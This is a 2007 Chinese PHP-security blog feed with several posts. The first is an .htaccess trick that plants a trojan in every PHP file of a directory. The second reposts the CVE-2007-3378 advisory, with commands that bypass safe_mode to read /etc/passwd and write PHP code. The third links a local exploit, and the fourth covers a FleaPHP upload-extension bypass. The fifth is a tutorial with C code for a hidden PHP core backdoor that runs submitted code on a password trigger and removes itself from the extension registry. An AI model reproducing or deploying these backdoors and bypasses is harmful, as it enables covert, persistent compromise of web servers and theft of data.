PHP博客-GaRY's Blog-随笔分类-PHP securityhttp://www.phpweblog.net/GaRY/category/84.htmlBeginning is always beautifulzh-cnFri, 04 Jan 2008 16:16:33 GMTFri, 04 Jan 2008 16:16:33 GMT60.htaccess后门http://www.phpweblog.net/GaRY/archive/2007/12/25/htaccess_backdoor.htmlwofeiwowofeiwoTue, 25 Dec 2007 05:44:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/12/25/htaccess_backdoor.htmlhttp://www.phpweblog.net/GaRY/comments/2595.htmlhttp://www.phpweblog.net/GaRY/archive/2007/12/25/htaccess_backdoor.html#Feedback1http://www.phpweblog.net/GaRY/comments/commentRss/2595.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/2595.html
PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:

auto_prepend_file string

指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path

特殊值 none 禁止了自动前缀。

auto_append_file string

指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path

特殊值 none 禁止了自动后缀。

Note: 如果脚本通过 exit() 终止,则自动后缀不会发生。


于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉.
本地测试了一下,写了个.htaccess文件到我的sphpblog目录中.

.htaccess

然后随意访问一下sphpblog中的任意文件.

.haccess

当然直接包含.haccess文件太明显了,上面一对无关和出错信息会出卖你的后门的.我这里只是PoC,要包含什么就随便各位了.
哦,还有一点,会很方便:

include_path    ".;/path/to/php/pear"    PHP_INI_ALL    

什么意思我就不说了.各位自己琢磨吧,呵呵


wofeiwo 2007-12-25 13:44 发表评论
]]>[zt]PHP 5.2.4 mail.force_extra_parameters unsecurehttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.htmlwofeiwowofeiwoMon, 26 Nov 2007 04:03:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.htmlhttp://www.phpweblog.net/GaRY/comments/2392.htmlhttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/2392.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/2392.htmlps:通过mail.force_extra_parameters,还真像当年的mail函数bypass safemode漏洞.


  Topic : PHP 5.2.4 mail.force_extra_parameters unsecure
  SecurityAlert : 47
  CVE : CVE-2007-3378
  SecurityRisk : Medium  alert
  Remote Exploit : No
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Maksymilian Arciemowicz
  Date : 25.11.2007
  Affected Software : PHP <= 5.2.4

  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.4 mail.force_extra_parameters unsecure ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 06.09.2007
- - Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages
quickly.
When using PHP as an Apache module, you can also change the
configuration settings using directives in Apache configuration
files (e.g. httpd.conf) and .htaccess files. You will need
"AllowOverride Options" or "AllowOverride
All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see
below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only
with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified
parameters to be passed as extra parameters to the sendmail
binary. These parameters will always replace the value of the 5th
parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. htaccess safemode and open_basedir Bypass Vulnerability
per mail.force_extra_parameters ---

We have recrived a lot of question about news
http://securityreason.com/news/0/0x1f . And we will show How to
exploit this issue. When using PHP as an Apache module, you can
also change the configuration settings using directives in
.htaccess file. But it is possible to bypass a safe_mode or
open_basedir per mail.force_extra_parameters. In a lot of servers
is sendmail, can be also exim etc. But we show how to exploit
this for a famous mail server (SENDMAIL).

For example you can set mail.force_extra_parameters via
.htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's see folder
"/narkotyk" in localhost:82.

cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
- -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
- -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
- -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>

cxib# curl http://localhost:82/narkotyk/file1.php
<br />
<b>Warning</b>: include() [<a
href='function.include'>function.include</a>]: SAFE MODE
Restriction in effect. The script whose uid is 80 is not allowed
to access /etc/passwd owned by uid 0 in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />
<br />
<b>Warning</b>: include(/etc/passwd) [<a
href='function.include'>function.include</a>]: failed to
open stream: Invalid argument in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />
<br />
<b>Warning</b>: include() [<a
href='function.include'>function.include</a>]: Failed
opening '/etc/passwd' for inclusion (include_path='.:') in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />

so safe_mode is open.
Let's see files .htaccess and file2.php

cxib# cat file2.php
<? var_dump(mail("root@localhost",
"hallo", "root")); ?>
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X
/usr/local/www/apache22/data/narkotyk/result.txt'

and let's send request to file2.php

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!? No

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
- -rw-r--r-- 1 www www 7130 Sep 7 00:31
/usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration
line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration
line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.

We can read file and safe_mode and open_basedir is bypassed.

It is possible create file with php code. But we need have
sendmail.cf to send email.

Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C
/usr/local/www/apache22/data/narkotyk/sendmail.cf -X
/usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx",
"h<? phpinfo(); ?>allo", "root"));
?>

We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf
and configure this file. Then

cxib# curl http://localhost:82/narkotyk/file3.php
bool(true)
cxib#
cxib# cat phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<< [EOF]
69757 === CONNECT securityreason.pl
... etc

and now

cxib# curl http://localhost:82/narkotyk/phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
... phpinfo().

This was example for php 5.2.4 with sendmail. But we think, it is
possible exploit exim and more send mail programs. In PHP 5.2.4
mail.force_extra_parameters is filtered per
php_escape_shell_cmd(). But we needn't bypass this function.

- --- mail.c ---
if (force_extra_parameters) {
extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}
- --- mail.c ---

Interesting is:

- --- mail.c ---
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE
Restriction in effect. The fifth parameter is disabled in SAFE
MODE.");
RETURN_FALSE;
}
- --- mail.c ---

5 th parameter in mail() function is checked.
mail.force_extra_parameters no.

Before public advisory we tested issue and we send advisory to
PHP Team. Main problem is that, we do not recived any answer.
We do not checked patch to CVE-2007-3378 (SREASONRES:20070627),
but we are using CVE-2007-3378 to identification .

http://securityreason.com/achievement_securityalert/47

php_escape_shell_cmd() is not reason for CVE-2007-3378.

- --- 2. Exploit ---
SecurityReason will not public official exploit for this issue.

Anybody can self exploit this.

- --- 3. How to fix ---

- --- note from SREASONRES:20070627 ---
This bug has been founded on February 2007
We contacted with PHP Team again.
With co-operation Stanislav Malyshev from PHP Team the PHP 5.2.5
is now fully patched against
"mail.force_extra_parameters" issue .
- --- note from SREASONRES:20070627 ---

Update to PHP5.2.5

- --- 4. Greets ---

For: sp3x, Infospec, p_e_a, l5x and Stefan Esser

- --- 5. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFHSZ1w3Ke13X/fTO4RAnKnAJ0drPZhrdtiheaR9b8mLZ0IjyJoIQCfZC3A
jn8i1L2eCHVS1jBuN24ySc0=
=ZCW0
-----END PGP SIGNATURE-----


wofeiwo 2007-11-26 12:03 发表评论
]]>好久没更新http://www.phpweblog.net/GaRY/archive/2007/07/24/1559.htmlwofeiwowofeiwoTue, 24 Jul 2007 14:42:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/07/24/1559.htmlhttp://www.phpweblog.net/GaRY/comments/1559.htmlhttp://www.phpweblog.net/GaRY/archive/2007/07/24/1559.html#Feedback3http://www.phpweblog.net/GaRY/comments/commentRss/1559.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1559.htmlphp-5.2.3-localexploit-for-win
Tested on winxp sp2 cn
exploit

wofeiwo 2007-07-24 22:42 发表评论
]]>FleaPHP默认上传类的一个隐患http://www.phpweblog.net/GaRY/archive/2007/05/30/Something_About_FleaPHP_Upload_Class.htmlwofeiwowofeiwoWed, 30 May 2007 08:56:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/05/30/Something_About_FleaPHP_Upload_Class.htmlhttp://www.phpweblog.net/GaRY/comments/1282.htmlhttp://www.phpweblog.net/GaRY/archive/2007/05/30/Something_About_FleaPHP_Upload_Class.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/1282.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1282.html随着各种开发框架的盛行,程序员也不愿意做那么多重复的事情了,开发,速度最重要.现在开发什么东西都讲究一个效率.
目前国内似乎还没有多少人对框架的安全性有多少研究.毕竟如果一个底层的编程框架出了问题,很多程序都将受到威胁.
我下了个国内现在很流行的php框架中一个:FleaPHP 1.0.70 beta.翻了翻他的FLEA/FLEA/Helper/FileUploader.php,这个是此框架默认的文件上传类.它有一个检查上传文件是否合法的函数:

    function check($allowExts = null, $maxSize = null)
    {
        if (!$this->isSuccessed()) { return false; }
        //允许上传的扩展名
        if ($allowExts) {
            if (strpos($allowExts, ',')) {
                $exts = explode(',', $allowExts);
            } elseif (strpos($allowExts, '/')) {
                $exts = explode('/', $allowExts);
            } elseif (strpos($allowExts, '|')) {
                $exts = explode('|', $allowExts);
            } else {
                $exts = array($allowExts);
            }

            $fileExt = strtolower($this->getExt());//获取扩展名
            $passed = false;
            $exts = array_filter(array_map('trim', $exts), 'trim');
            foreach ($exts as $ext) {
                if (substr($ext, 0, 1== '.') {
                    $ext = substr($ext, 1);
                }
                if ($fileExt == strtolower($ext)) {
                    $passed = true;
                    break;
                }
            }
            if (!$passed) {
                return false;
            }
        }

        if ($maxSize && $this->getSize() > $maxSize) {
            return false;
        }

        return true;
    }

再看getExt函数:

    function getExt()
    {
        if ($this->isMoved()) {
            return pathinfo($this->getNewPath(), PATHINFO_EXTENSION);
        } else {
            return pathinfo($this->getFilename(), PATHINFO_EXTENSION);
        }
    }

继续跟踪php的pathinfo函数:

/* {{{ proto array pathinfo(string path[, int options])
   Returns information about a certain string */
PHP_FUNCTION(pathinfo)
{
    zval *tmp;
    char *path, *ret = NULL;
    int path_len, have_basename;
    size_t ret_len;
    long opt = PHP_PATHINFO_ALL;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l"&path, &path_len, &opt) == FAILURE) {
        return;
    }

    have_basename = ((opt & PHP_PATHINFO_BASENAME) == PHP_PATHINFO_BASENAME);
    
    MAKE_STD_ZVAL(tmp);
    array_init(tmp);
    
    ......
    ......

    if ((opt & PHP_PATHINFO_EXTENSION) == PHP_PATHINFO_EXTENSION) {
        char *p;
        int idx;

        if (!have_basename) {
            php_basename(path, path_len, NULL, 0&ret, &ret_len TSRMLS_CC);
        }

        p = zend_memrchr(ret, '.', ret_len);

        if (p) {
            idx = p - ret;
            add_assoc_stringl(tmp, "extension", ret + idx + 1, ret_len - idx - 11);
        }
    }
    
    ......
    ......

    zval_ptr_dtor(&tmp);
}
/* }}} */

到这里明白了,原来都只看文件名最后一个  "."  之后的部分作为文件的扩展名.那么如果根据apache的一个特性,我们可以使用多扩展名的方式上传php文件而绕过验证.(比如允许的扩展名里有rar,pdf等apache不认识但常见的类型,我们就可以上传shell.php.rar并得以执行)

当然这个只是个安全隐患而已.并不是所有用FleaPHP的程序都有这个问题.
就像superhei说的那样,关键在于看开发者如何去使用框架,不能太过依赖于框架提供的函数.而必须自己做些必要的前提验证.就能避免漏洞



wofeiwo 2007-05-30 16:56 发表评论
]]>Developing A PHP Core Backdoorhttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.htmlwofeiwowofeiwoWed, 23 May 2007 12:01:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.htmlhttp://www.phpweblog.net/GaRY/comments/1242.htmlhttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/1242.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1242.htmlAuthor: wofeiwo/GaRY  <wofeiwo_at_gmail_dot_com>


目录

1)前言
2)优缺点
3)设计
4)功能实现
5)参考文档
6)一些说明


1)前言

PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现.由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor.而且php支持使用dl函数动态加载模块的技术,这种类似linux等系统上的LKM机制让我们的Backdoor可以更轻松的加载.本文就简单介绍下修改PHP内核的Backdoor的实现.

2)优缺点

优点:

1. 众所周知,PHP是一个跨平台的脚本语言,所以php Backdoor也可以很方便得跨平台.当然这必须要求你尽量使用C库或者使用php内核中提供的API来编写代码.而尽量少用系统API.不过这总比ring0下的Backdoor什么都要自己实现要好.
2. 由于PHP与客户端的通讯是通过http协议实现的.所以也不用担心端口隐藏,进程隐藏等问题.
3. 加载方便.你可以通过设置php.ini或者使用dl函数来加载你的Backdoor.或者,如果你愿意的话你可以把Backdoor编译到php里去.
4. 配合webshell使用,用Backdoor配置php环境,让webshell突破disable fuction,safe_mode,open_basedir等限制.

缺点:

1. 权限低.Backdoor的权限完全取决于web server程序的权限.必须与其他工具配合使用以得到高权限.
2. 基于php,只是一个ring3下的Backdoor,所以不能太底层,很多功能都受到限制.

3)设计:

我们这里做为一个例子,设计了个简单的php Backdoor,它主要实现了几个功能:

1. 通过过滤用户提交的特定变量来启动Backdoor.
2. 修改php环境变量.为webshell提供宽松的执行环境.
3. 直接执行用户提交的php代码.
4. 隐藏自身.

4)功能实现

前置知识:
要编写php Backdoor,必须先了解php module的编写技术.这个内容超出本文的范围,读者可以看下本文最后列出的参考文档.并且最好先查看以下文件以熟悉php内核的API.

php-src/main/php.h, 位于PHP 主目录。这个文件包含了绝大部分 PHP 宏及 API 定义。
php-src/Zend/zend.h, 位于 Zend 主目录。这个文件包含了绝大部分 Zend 宏及 API 定义。
php-src/Zend/zend_API.h, 也位于 Zend 主目录,包含了Zend API 的定义。

以下的结构体,定义了一个PHP Backdoor模块的基本信息:

zend_module_entry wfw_module_entry = {
 STANDARD_MODULE_HEADER,
 "wfw",     //模块名
 wfw_functions,   //导出函数结构体
 PHP_MINIT(wfw),  //模块初始化
 PHP_MSHUTDOWN(wfw), //模块清理
 PHP_RINIT(wfw),  //运行时初始化
 PHP_RSHUTDOWN(wfw), //运行时清理
 PHP_MINFO(wfw),  //处理phpinfo中的模块信息
 "0.1",     //模块版本
 STANDARD_MODULE_PROPERTIES
};


在php生命周期中,ZendEngine首先要初始化module,每个module中定义的PHP_MINIT_FUNCTION函数作为初始化代码(ModuleInit)都会被执行一次,而PHP_RINIT_FUNCTION函数则是在每次页面被请求的时候(RuntimeInit)都会执行一次.因此对php函数的hook,设置php环境变量,对user input的过滤,都可以根据需要在这两个函数中进行.然后在PHP_MSHUTDOWN_FUNCTION和PHP_RSHUTDOWN_FUNCTION中进行相应的清理.而作为Backdoor,PHP_MINFO_FUNCTION函数对我们则没什么必要,可以把这里设置为NULL.

当然会了php api还不够,再配合各系统上提供的api,并通过宏定义区分以跨平台.一个backdoor是很容易编出来的.在本文中我不会直接说明每个功能的实现,这些在所有ring3后门中都大同小异.我只说明些在PHP core环境下需要注意的部分.
 
过滤变量:
要过滤web server传递过来的变量,这有两种办法,一种是通过修改SAPI的input_filter,或者是treat_data.你可以是hook后再执行php的原始代码,也可以直接替换原始函数:

 

//
//函数原型如下:
//unsigned int input_filter(int arg, char *var, char **val, unsigned int val_len, unsigned int *new_val_len TSRMLS_DC)
//arg可以是PARSE_POST,PARSE_GET,PARSE_COOKIE,PARSE_STRING,PARSE_ENV等值,表示此变量是通过什么方式传递进来的.
//var,val分别是变量名和变量值
//
SAPI_API SAPI_INPUT_FILTER_FUNC(wfw_input_filter)
{
 if(new_val_len) *new_val_len = val_len;
 
 ////////////////////////////////////////////////////////
 //以上是原php中处理的代码,下面则是我添加的.
 ////////////////////////////////////////////////////////
 if(strcmp(var,"pw"== 0 || strcmp(*val,"password"== 0)
  dosomething();
 ////////////////////////////////////////////////////////
 return SUCESS;
}

void wfw_hook_input_filter()
{
 sapi_register_input_filter(wfw_input_filter); //注册为input_filter
}

另外一种是直接从php内建的数组里获取变量:

int find_var()
{
 zval **array, **data;
 
 TSRMLS_FETCH();

 //查找_GET数组
 if(SUCCESS != zend_symtable_find(&EG(symbol_table), "_GET", strlen("_GET")+1, (void **)&array))
 {
  return FAILURE;
 }
 //查找pw变量 
 if(SUCCESS != zend_symtable_find(HASH_OF(*array), "pw", strlen("pw")+1, (void **)&data))
 {
  return FAILURE;
 }
// 比对pw变量值,是密码,则执行我们的代码.
 if(strcmp(Z_STRVAL_PP(data),"password"== 0)
  dosomething();
 return SUCCESS;
}

使用那一种方式就看你的要求了.第一种可以直接获得用户提交的原始数据,如果你要在这里做处理或者filter,可以使用这种方法,一般没有特殊要求,使用第二种方法就可以了.

设置环境:
只要修改每次RINIT时候的ini设置,就可以了,我们使用ZEND API: zend_alter_ini_entry就可以实现这个功能:

 

zend_alter_ini_entry("safe_mode", sizeof("safe_mode"), "0", sizeof("0"- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);

执行用户提交的代码:
过滤web server传递过来的变量,并用以下函数执行即可:

int run_user_code(char *str)
{
 int result;
 zval retval_ptr;
 result = zend_eval_string(str, &retval_ptr, string_name TSRMLS_CC);
 convert_to_string(retval_ptr);
 php_printf("%s\r\n", Z_STRVAL(zval));
 return result;
}

Hook函数:
Hook函数有不同方式,根据需要Hook函数类型的不同而不同,比如我想要替换phpinfo这个php语言内建函数,只需要这么做:

//注册新函数结构体
zend_function_entry hooked_functions[] = {
 PHP_NAMED_FE(phpinfo, PHP_FN(hooked_phpinfo), NULL//注册为phpinfo的别名
 {NULL, NULL, NULL/* Must be the last line in wfw_functions[] */
};

void hook_fuctions(void)
{
 TSRMLS_FETCH();
 
 /* 替换函数 */
 zend_hash_del(CG(function_table), "phpinfo", sizeof("phpinfo")); //从completer global里删除phpinfo函数
 //注册新函数
#ifndef ZEND_ENGINE_2
 zend_register_functions(hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC); 
#else
 zend_register_functions(NULL, hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
}

//新函数
PHP_FUNCTION(hooked_phpinfo)
{
 ..
}
/* {{{ PHP_MINIT_FUNCTION
 */
PHP_MINIT_FUNCTION(wfwcbd)
{
 hook_fuctions();
 
 

 return SUCCESS;
}

但是如果想要替换的是php内核的底层api,恐怕就需要使用到其他ring3 hook技术了.inline hook等.但幸好backdoor加载进php内核后和其他api是在同一进程上下文中的,所以查找函数地址也就比较方便.相信也不难实现,但是本文写作过程中并没有测试,有意的朋友可以自己尝试下.

隐藏:
这里所谓的隐藏并不是隐藏我们的文件,而是让我们的Backdoor module在php中不可见.具体做法是让我们的module注册为zend extension,而在module_registry中删除自身.这样get_loaded_extensions也就找不到我们模块的信息了.zend_extension结构体定义如下:

 

struct _zend_extension {
 char *name;
 char *version;
 char *author;
 char *URL;
 char *copyright;

 startup_func_t startup;   //相当于MINIT
 shutdown_func_t shutdown;    //相当于MSHUTDOWN
 activate_func_t activate;  //相当于RINIT
 deactivate_func_t deactivate; //相当于RSHUTDOWN

 message_handler_func_t message_handler;

 op_array_handler_func_t op_array_handler;

 statement_handler_func_t statement_handler;
 fcall_begin_handler_func_t fcall_begin_handler;
 fcall_end_handler_func_t fcall_end_handler;

 op_array_ctor_func_t op_array_ctor;
 op_array_dtor_func_t op_array_dtor;

 int (*api_no_check)(int api_no);
 void *reserved2;
 void *reserved3;
 void *reserved4;
 void *reserved5;
 void *reserved6;
 void *reserved7;
 void *reserved8;

 DL_HANDLE handle;
 int resource_number;
};

实现代码如下:

 

#include "zend_extensions.h"

static zend_llist_position lp = NULL;
static void wfw_op_array_ctor(zend_op_array *op_array);
static void wfw_op_array_dtor(zend_op_array *op_array);
static int (*old_startup)(zend_extension *extension) = NULL;
static zend_extension *ze = NULL
static int wfw_module_startup(zend_extension *extension);
static void wfw_module_active(void);
static void wfw_module_deactive(void);
static void wfw_shutdown(zend_extension *extension);
static int wfw_startup_wrapper(zend_extension *ext);


static zend_extension wfw_zend_extension_entry = {
 "wfwcbd",
 "0.1",
 "wfw PHP Core BackDoor",
 "http://www.phpweblog.net/GaRY",
 "(C) Copyright 2007",
 
 wfw_module_startup,
 wfw_shutdown,
 wfw_module_active,
 wfw_module_deactive,
 NULL,
 NULL,
 NULL,
 NULL,
 NULL,
 wfw_op_array_ctor,
 wfw_op_array_dtor,
 
 STANDARD_ZEND_EXTENSION_PROPERTIES
};


/* {{{ wfw_functions[]
 *
 * Every user visible function must have an entry in wfw_functions[].
 */
zend_function_entry wfw_functions[] = {
 PHP_FE(your_ext_function,   NULL)
 ..
 ..
 {NULL, NULL, NULL/* Must be the last line in wfw_functions[] */
};
/* }}} */

zend_module_entry phper_module_entry = {
#if ZEND_MODULE_API_NO >= 20010901
 STANDARD_MODULE_HEADER,
#endif
 "phper",
 NULL,
 PHP_MINIT(phper),
 NULL, // PHP_MSHUTDOWN(phper),  //同时我们这里也就不需要以下函数了.全部替换为NULL,用zend extension里的同功能函数代替
 NULL, // PHP_RINIT(phper),  
 NULL, // PHP_RSHUTDOWN(phper), 
 NULL, // PHP_MINFO(phper),
#if ZEND_MODULE_API_NO >= 20010901
 "0.1", /* Replace with version number for your extension */
#endif
 STANDARD_MODULE_PROPERTIES
};

static void wfw_op_array_ctor(zend_op_array *op_array)
{
}

static void wfw_op_array_dtor(zend_op_array *op_array)
{
 if (wfw_zend_extension_entry.resource_number != -1) {
  op_array->reserved[wfw_zend_extension_entry.resource_number] = NULL;
 }
}

static int wfw_startup_wrapper(zend_extension *ext)
{
 int res;
 php_printf("php startup_wrapper\r\n");
 ze->startup = old_startup;
 res = old_startup(ext);
 wfw_module_startup(NULL);
 
 return res;
}

static int wfw_module_startup(zend_extension *extension)
{
 zend_module_entry *module_entry_ptr;
 int resid;
 TSRMLS_FETCH();
 
 php_printf("php_startup\r\n");
#ifndef ZEND_ENGINE_2
 zend_register_functions(wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#else
 zend_register_functions(NULL, wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
 if (zend_hash_find(&module_registry, "wfwcbd", sizeof("wfwcbd"), (void **)&module_entry_ptr)==SUCCESS) {
  
  if (extension) {
  extension->handle = module_entry_ptr->handle;
  } else {
  zend_extension ext;
  ext = wfw_zend_extension_entry;
  ext.handle = module_entry_ptr->handle;
  zend_llist_add_element(&zend_extensions, &ext);
  extension = zend_llist_get_last(&zend_extensions);
  }
  module_entry_ptr->handle = NULL;
  //
  //删除module_registry中的信息
  //
  if(SUCCESS != zend_hash_del(&module_registry, "wfwcbd", sizeof("wfwcbd"))) return FAILURE;

 } else {
  return FAILURE;
 }

 resid = zend_get_resource_handle(extension);
 wfw_zend_extension_entry.resource_number = resid;

 return SUCCESS;


static void wfw_module_active()
{
 //php_printf("wfw active!\r\n");
 do_something_while_active();
}
static void wfw_module_deactive()
{
 //php_printf("wfw deactive!\r\n");
 do_something_while_deactive();
}
static void wfw_shutdown(zend_extension *extension)
{
 //php_printf("wfw shutdown\r\n");
 do_something_while_shutdown();
}

再配合hook phpinfo等函数,就可以让我们对php环境变量做的修改看不出来: